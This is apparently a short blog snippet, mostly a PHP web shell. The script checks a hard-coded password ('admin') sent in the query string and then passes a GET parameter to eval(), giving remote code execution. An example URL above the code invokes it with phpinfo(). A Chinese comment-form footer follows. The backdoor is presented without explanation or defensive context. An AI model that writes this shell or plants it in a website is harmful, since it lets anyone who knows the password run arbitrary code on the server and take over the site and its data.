http://url/test.php?pwd=admin&action=eval&a=phpinfo();

    $passwd="admin";    
    if($_GET['pwd']!=$passwd) exit;
    if($_GET['action']=="eval" && $_GET['a']){
       eval($_GET['a']);
    }
    exit;

发表评论

电子邮件地址不会被公开。 必填项已用*标注